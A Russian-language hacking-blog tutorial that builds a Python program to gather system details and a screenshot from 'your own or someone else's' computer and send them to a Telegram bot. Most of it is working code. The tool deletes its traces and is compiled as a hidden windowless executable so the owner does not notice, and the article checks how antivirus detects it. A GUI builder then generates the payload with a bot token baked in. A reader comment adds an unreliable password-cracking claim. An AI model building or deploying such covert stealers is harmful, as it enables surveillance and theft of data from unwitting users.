Если вы часто имеете дело с разными компьютерами, вам, конечно, нужен простой в использовании и быстрый инструмент для сбора информации о системе. Сегодня я покажу, как сделать программу, которая удаленно с помощью Python может получить из своей или чужой системы некоторые важные данные — от IP до модели процессора и отсылающую собранные данные в Telegram.
Еще по теме: Взлом WiFi на Python
Чтобы просто посмотреть IP-адрес и другие настройки сети, вам придется обратиться к командной строке и выполнить команду ipconfig /<wbr />all. Ситуация одна из самых частых для эникейщиков и удаленных шаманов, но она хотя бы быстро решаема. Но если придется собирать более серьезный набор информации о машине, с которой сейчас будете работать, — без автоматизации не обойтись. Этим мы сегодня и займемся.
Сбор информации о системе удаленно с помощью Python
Имейте в виду, что эта программа может использоваться как для быстрого сбора информации о своей системе, так и для кражи идентифицирующей информации с компьютера жертвы. Мы граждане законопослушные, поэтому пусть это и не пароли, но, чтобы не раздражать правоохранителей, все тесты будут проводиться на изолированных виртуальных машинах.
Статья написана исключительно для пентестеров (хакеров, у которых есть разрешение для проведение тестирования на проникновение). Несанкционированный доступ к компьютерной информации — преступление. Ни автор статьи, ни редакция сайта spy-soft.net не несут ответственности за ваши действия.
Инструменты
Сначала давайте разберемся, где будем писать код. Можно кодить в обычном виндовом «Блокноте», но мы воспользуемся специальной IDE для Python — PyCharm. Установка и настройка просты как два рубля: скачал установщик, запустил — и кликай себе «Далее», пока есть такая кнопка.
Еще нам потребуется Python. Я буду использовать версию 3.9.0 — с ней точно все работает.
Задачи
Давай сначала обрисуем, что мы вообще планируем делать. Я планирую собирать следующую информацию:
- IP-адрес.
- MAC-адрес.
- Имя пользователя.
- Тип операционной системы.
- Скорость работы системы.
- Время.
- Скриншот.
- Скорость интернет‑соединения.
- Модель процессора.
И отправляться это все будет прямиком вам в телегу через специальный бот.
Зачем?
Наверняка у вас возник вопрос: зачем может понадобиться MAC-адрес или модель процессора? Эти параметры меняются очень и очень редко, так что прекрасно подходят для фингерпринтинга. Даже если пользователь купит более быстрый интернет‑канал или поменяет часовой пояс, вы без особого труда сможете определить, что уже имел дело с этим компьютером. Стоит помнить, что ровно такие же методы используют хитрые рекламщики для идентификации пользователей, да и разработчики триальных версий программ тоже. Эта статья поможет чуть лучше понять, что можно узнать о вашем компьютере в полностью автоматическом режиме, а как применить эту информацию — решать только вам.
В этой статье мы не будем показывать, как сформировать устойчивый к незначительным изменениям идентификатор, который поможет однозначно определить конкретный компьютер. Если вам станет интересно — пишите в комментах, и, возможно, я напишу небольшую статью на эту тему!
Создаем основу программы
Для отправки данных я решил воспользоваться Telegram-ботом. Создать его вы можете через BotFather, а после сохранить token вашего творения. Публиковать его нельзя — любой, кто получит этот токен, сможет захватить контроль над вашим ботом.
Для подключения к Bot API «телеги» нужны всего две строчки:
1 2 |
import telebot bot = telebot.TeleBot("token from BotFather") # Подключение бота |
Чтобы оценить быстродействие, можно написать еще пару строк. Весь дальнейший код расположим между ними. Описанное выше подключение бота уже вписано сюда.
1 2 3 4 5 6 7 |
import telebot from datetime import datetime bot = telebot.TeleBot("token") start = datetime.now() # Начало отсчета # Сюда поместим нашу основу, поэтому оставляем место ends = datetime.now() # Конец отсчета workspeed = format(ends - start) # Вычисление времени |
Теперь перейдем собственно к сбору данных.
Сбор данных
1 2 3 4 5 6 7 8 9 10 11 |
import getpass import os import socket from datetime import datetime from uuid import getnode as get_mac import pyautogui from speedtest import Speedtest import telebot import psutil import platform from PIL import Image |
Теперь кратко рассмотрим, что делает каждый модуль. Если какие‑то функции вам не нужны, выбросите строку импорта модуля и код, который использует этот модуль. Все просто!
Итак, за работу с ОС и локальными ресурсами отвечают эти 4 модуля:
- getpass нужен для определения информации о пользователе;
- os используем для взаимодействия с функциями ОС, вроде вызова внешних исполняемых файлов;
- psutil работает с некоторыми низкоуровневыми системными функциями;
- platform предоставит информацию об ОС.
Этими модулями реализованы сетевые взаимодействия:
- socket — для работы с сокетами и получения IP-адресов;
- getnode получает MAC-адрес машины;
- speedtest замеряет характеристики интернет‑соединения;
- telebot сделает всю рутину по работе с Telegram-ботом.
Служебные примочки, которые трудно отнести к категориям выше:
- datetime позволит определить время работы программы;
-
pyautogui
быстро и без болиработает с GUI; - PIL.<wbr />Image — для снятия скриншота.
После этого нам требуется узнать основные стабильные характеристики системы: IP- и MAC-адреса, имя пользователя и ОС:
1 2 3 4 |
name = getpass.getuser() # Имя пользователя ip = socket.gethostbyname(socket.getfqdn()) # IP-адрес системы mac = get_mac() # MAC адрес ost = platform.uname() # Название операционной системы |
Строки кода снабжены комментариями и в пояснениях не нуждаются.
Скорость интернет-соединения
1 2 3 4 5 6 |
from speedtest import Speedtest # Импорт модуля. Рассматривался выше inet = Speedtest() download = float(str(inet.download())[0:2] + "." # Входящая скорость + str(round(inet.download(), 2))[1]) * 0.125 uploads = float(str(inet.upload())[0:2] + "." # Исходящая скорость + str(round(inet.download(), 2))[1]) * 0.125 |
Скорость замеряется библиотекой сервиса Speedtest.net и, соответственно, выдает результат в мегабитах, а не мегабайтах. Чтобы это исправить, разделим численный результат на 8 или умножим на 0,125 — это одно и то же. Манипуляцию проделываем дважды — для входящей и исходящей скорости.
Важно понимать, что замер не претендует на сверхточность, потому что мы никак не можем легко проверить, какую часть канала потребляют другие программы или даже другие устройства в сети. Если вы подключились к рабочей станции удаленно, ваше соединение тоже что‑то будет потреблять. В программе поправка на это не реализована из‑за ее слишком низкой точности и трудоемкости.
Часовой пояс и время
1 2 3 |
import psutil zone = psutil.boot_time() # Узнает время, заданное на компьютере time = datetime.fromtimestamp(zone) # Переводит данные в читаемый вид |
Если вы настраиваете чей‑то сервер или слишком удаленный компьютер, время может отличаться. Ко всем прочим данным добавим и показания часов — информация лишней не бывает. Если вы не знали, неправильно выставленное время и/или часовой пояс может вызывать сбои при подключении к сайтам, использующим HTTPS, а этот кусочек кода позволит легко выявить такие проблемы.
Частота процессора
1 2 |
import psutil cpu = psutil.cpu_freq() |
Может помочь выявить причину тормознутости компьютера: если процессор постоянно молотит на полную, но программы виснут — процессор устарел, а если простаивает — виновата программа. Да и просто общее представление о железе дает.
Более глубокий фингерпринтинг
В этой статье умышленно не рассказывается, как получить идентификатор жесткого диска или GUID установленной Windows: мы не методичку для рекламщиков пишем, а программировать тренируемся. Тем не менее вы легко можете добавить сбор и такой информации, воспользовавшись консольной утилитой wmic. Ее вывод можно парсить с помощью Python-скрипта, так что даже не придется писать лишние обвязки. На скриншоте пример получения серийного номера BIOS.
Скриншот рабочего стола
1 2 3 4 5 6 7 8 9 10 11 |
os.getcwd() try: # Перехват ошибки в случае неверно указанного расположения os.chdir(r"/temp/path") except OSError: @bot.message_handler(commands=['start']) def start_message(message): # Служебная обвязка для бота bot.send_message(message.chat.id, "[Error]: Location not found!") bot.stop_polling() bot.polling() raise SystemExit screen = pyautogui.screenshot("screenshot.jpg") # Снятие скриншота |
Тут все тоже максимально просто, а за собственно снятие скриншота отвечает только последняя строка кода. Остальное мы используем для корректной обработки входящей команды бота.
Запись в файл
Теперь, когда все готово, мы можем приступать к финальному сбору и отправке данных. Создаем готовый файл с нашими данными: если использовался максимальный сбор информации, а точнее весь код выше, то используем такую запись, в противном случае убирайте ненужные вам данные:
1 2 3 4 5 6 7 8 9 10 11 12 |
try: # Обвязка для обработки команд боту os.chdir(r"/temp/path") except OSError: @bot.message_handler(commands=['start']) def start_message(message): bot.send_message(message.chat.id, "[Error]: Location not found!") bot.stop_polling() bot.polling() raise SystemExit file = open("info.txt", "w") # Открываем файл file.write(f"[================================================]\n Operating System: {ost.system}\n Processor: {ost.processor}\n Username: {name}\n IP adress: {ip}\n MAC adress: {mac}\n Timezone: {time.year}/{time.month}/{time.day} {time.hour}:{time.minute}:{time.second}\n Work speed: {workspeed}\n Download: {download} MB/s\n Upload: {uploads} MB/s\n Max Frequency: {cpu.max:.2f} Mhz\n Min Frequency: {cpu.min:.2f} Mhz\n Current Frequency: {cpu.current:.2f} Mhz\n[================================================]\n") # Пишем file.close() # Закрываем |
Длинный, но легко читаемый код. Первая его часть обеспечивает обработку команды /<wbr />start, вторая — запись всех данных в файл. Результат попадет в info.<wbr />txt, но путь, конечно, можно изменить прямо в коде.
Дело остается за малым — отправить результат в Telegram.
Отправка данных
Теперь дополним код выше, чтобы он еще и файлы отправлял.
1 2 3 4 5 6 7 8 9 10 11 12 13 |
text = "Screenshot" # Требуется при создании скриншота (текст к фото) @bot.message_handler(commands=['start']) # Выполняет действия при команде start def start_message(message): upfile = open("Путь до файла\info.txt", "rb") # Читает файлы uphoto = open("Путь до файла\screenshot.jpg", "rb") bot.send_photo(message.chat.id, uphoto, text) # Отправляет данные bot.send_document(message.chat.id, upfile) upfile.close() # Закрывает файлы (обязательно) uphoto.close() os.remove("info.txt") # Удаляет файлы, чтобы не оставлять следы os.remove("screenshot.jpg") bot.stop_polling() # Закрывает соединение после отправки bot.polling() # Создает соединение с ботом |
Сначала указывается подпись к скриншоту, потом читаем и отправляем файлы в виде фото и документа, затем зачищаем следы и закрываем соединение с ботом. Ничего сложного!
Естественно, если нам не нужен, к примеру, скриншот, мы можем вырезать код его отправки, получив такой вариант:
1 2 3 4 5 6 7 8 |
@bot.message_handler(commands=['start']) def start_message(message): upfile = open("Путь до файла\info.txt", "rb") bot.send_document(message.chat.id, upfile) upfile.close() os.remove("info.txt") bot.stop_polling() bot.polling() |
Чтобы бот гарантированно отправлял все сообщения вам, укажите вместо message.chat.id ID чата с собой. Его можно узнать через бот GetMyID.
Также следует учесть одну деталь: перед запуском программы вы должны отправить своему боту команду /start, чтобы он понял, кому следует отправлять данные.
Собираем программу
Чтобы не тянуть с собой на другой компьютер Python и зависимости программы, давайте упакуем все в один исполняемый файлик. Делается это с помощью PyInstaller, который ставится простой командой pip <wbr />install <wbr />pyinstaller.
Переходим с помощью командной строки в папку с нашей программой и собираем ее командой
1 |
pyinstaller -i путь_до_иконки --onefile наш_файл.py |
Аргумент --onefile заставит PyInstaller упаковать все в единственный файл. После -i надо указать путь до иконки исполняемого файла, если вы хотите ее использовать. Если она не нужна, просто удалите этот аргумент. Последним идет путь к файлу с нашим кодом. Если вы не хотите, чтобы при запуске появлялась консоль (например, если владелец компьютера не знает, что вы собрались ему помочь :D), поменяйте расширение входного файла с кодом на .<wbr />pyw или укажите опцию -w.
Не забывайте проверять наличие модулей и их обновлений, чтобы избежать ошибок. Временный путь можно указать любой, но лично я указываю C:\<wbr />Temp. Само собой, если обнаружена ОС на базе Linux, то этот код придется поправить.
Еще следует проверить, как сильно и чем детектится наш файл. Чтобы вам не лезть на VirusTotal, я сделал это сам.
Полный код проекта я разместил на GitHub. Там есть и программа‑сборщик, о которой я расскажу ниже.
Пишем сборщик с графическим интерфейсом
Для создания GUI сборщика нам придется работать с библиотекой Tkinter, поэтому прежде всего импортируем ее и нужные элементы:
1 2 3 |
# -*- coding: utf-8 -*- # Не забываем указывать конфигурацию from tkinter import * # Сама библиотека для работы from tkinter import messagebox as mb # Функция для создания окон с информацией |
После этого нужно создать окно, которое и будет основой интерфейса:
1 2 3 |
root = Tk() root.title("Tkinter") # Название программы root.geometry("300x400") # Разрешение окна программы |
Нам нужен только ввод API-ключа для доступа к боту. Делается такой ввод кодом ниже:
1 2 3 4 |
text = Label(root, text="Telegram bot token") # Текст для обозначения поля text.grid(padx=100, pady=0) # Расположение по x/y API = Entry(root, width=20) # Создание поля ввода данных API.grid(padx=100, pady=0) |
Это создаст два графических объекта — поле ввода и подпись к нему.
В этом интерфейсе не хватает кнопки для сборки выходного файла. Давайте создадим ее:
1 2 |
button = Button(root, text="Create", command=clicked, height=2, width=10) button.grid(padx=100, pady=0) |
Создаем функцию, которая должна находиться в файле после импорта библиотек. В ней мы должны создавать файл и записывать в него код полезной нагрузки.
1 2 3 4 5 6 |
def clicked(): system = open("source.py", "w") system.write(''' # Сюда перемещаем полный код программы, которую мы писали раньше ''') system.close() |
Не шутите с пробелами! Перед тем как вставлять код, убедитесь, что там нет лишних пробелов, иначе может возникнуть трудно обнаружимая ошибка.
Но на этом наша функция не заканчивается, так как нужно дать пользователю понять, готов ли файл. Делаем это с помощью MessageBox:
1 2 3 4 |
if API.get() or direct.get() == "": mb.showwarning("WARNING", "There are empty fields") else: mb.showinfo("INFO", "The system.py file is ready!") |
Теперь осталось только запустить отрисовку и обработку сообщений строкой root.<wbr />mainloop(<wbr />).
Опционально можно собрать и сборочный интерфейс. Для этого используем старый добрый PyInstaller:
1 |
pyinstaller -F -w --onefile программа.py |
И все готово! Теперь вы имеете полноценную программу для сбора данных о системе и ее сборщик, который ускорит процесс работы.
Каждый раз прибегать к PyInstaller, чтобы собрать программу, не слишком удобно. Можно воспользоваться модулем os и вызывать PyInstaller автоматически.
1 2 3 4 5 6 |
import os os.system("pyinstaller --onefile наш_файл.py") # Сборка выходного бинарника os.rmdir("build") os.rmdir("__pycache__") os.remove("system.py") os.remove("system.spec") |
Если вам понадобилась иконка, можно добавить в команду сборки параметр -i <wbr />file.<wbr />ico, а для сборки «невидимой» программы дописать -w — ровно как при ручной сборке!
Вывод
В этой статье мы разобрали от начала и до конца, как вытащить из своей или чужой системы некоторые важные данные — от IP до модели процессора. Конечно, главное тут в том, что вы научились хоть немного писать код самостоятельно — а применить всегда куда‑нибудь получится.
Если заинтересовались программированием на Python — почитайте нашу статью о написании простого вируса, она станет отличным закреплением навыков программирования. Успехов!
Еще по теме: Простой кейлоггер на Python
помнится пифоном с помощью мощного пк через usb можно ломануть пароль . простая програмулина как мне поясняли прописывает и сбрасывает каждый раз новый пароль пока у взламываемого устройства не переполнится стек после чего устройство само отключает свою парольную защиту- как то так. 16 значный я ломал часа за 4. был бы комп помощнее наверно можно было бы и побыстрее.
здравствуйте можете написать на почту jumabekova060@gmail.com